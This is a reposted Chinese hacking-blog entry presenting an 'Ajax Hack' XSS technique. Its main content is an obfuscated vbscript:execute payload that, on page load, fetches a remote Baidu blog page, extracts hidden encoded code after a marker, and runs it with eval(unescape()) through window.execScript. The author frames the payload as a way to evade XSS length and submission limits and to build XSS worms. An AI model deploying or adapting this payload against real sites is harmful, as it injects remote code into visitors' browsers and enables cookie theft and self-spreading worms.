博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
一个有趣的Ajax Hack示范
阅读量:6756 次
发布时间:2019-06-26

本文共 1110 字,大约阅读时间需要 3 分钟。

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。 

来看看他的一段VBSCRIPT脚本 

vbscript:execute("  dim l,s:  l=chr(13)+chr(10):  s=""sub mycode""&l:  s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:  s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:  s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:  s=s&""http.open """"get"""",url,false""&l:  s=s&""http.send("""""""")""&l:  s=s&""pg=http.responseText""&l:  s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:  s=s&""if p=null or p<1 then exit sub""&l:  s=s&""p=instr(p,pg,chr(37))""&l:  s=s&""if p=null or p<1 then exit sub""&l:  s=s&""p2=instr(p,pg,chr(60))""&l:  s=s&""cd=mid(pg,p,p2-p)""&l:  s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:  s=s&""window.execScript ht,""""jscript""""""&l:  s=s&""end sub""&l:  execute(s):  document.body.onload=getref(""mycode""):  ")

调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html 

这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验。 
再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!

转载地址:http://mhgho.baihongyu.com/

你可能感兴趣的文章
私服 Nexus 的配置
查看>>
Linux System and Performance Monitoring(Network篇)
查看>>
XenServer关闭电源以后部分虚机无法启动
查看>>
IIS部署flask之实现文件上传功能
查看>>
redis开机启动
查看>>
XaaS ------什么都是一种服务
查看>>
Linux下磁盘配额
查看>>
从雅迪赞助FIFA世界杯透视体育营销趋势
查看>>
Android通过APN进行网络连接
查看>>
《用chsh选择shell》-linux命令五分钟系列之十二
查看>>
parseDouble() 的用法
查看>>
shell的基础语法
查看>>
另类L2TP Tunnel
查看>>
CentOS 6.9使用Shell脚本实现FTP自动上传和下载文件
查看>>
#51CTO学院四周年#我与51CTO不得不说多的故事
查看>>
java函数参数默认值
查看>>
远程关机对企业的意义
查看>>
Kafka笔记整理(三):消费形式验证与性能测试
查看>>
WINPE集成SCSI/RAID驱动
查看>>
我们为什么需要大数据?
查看>>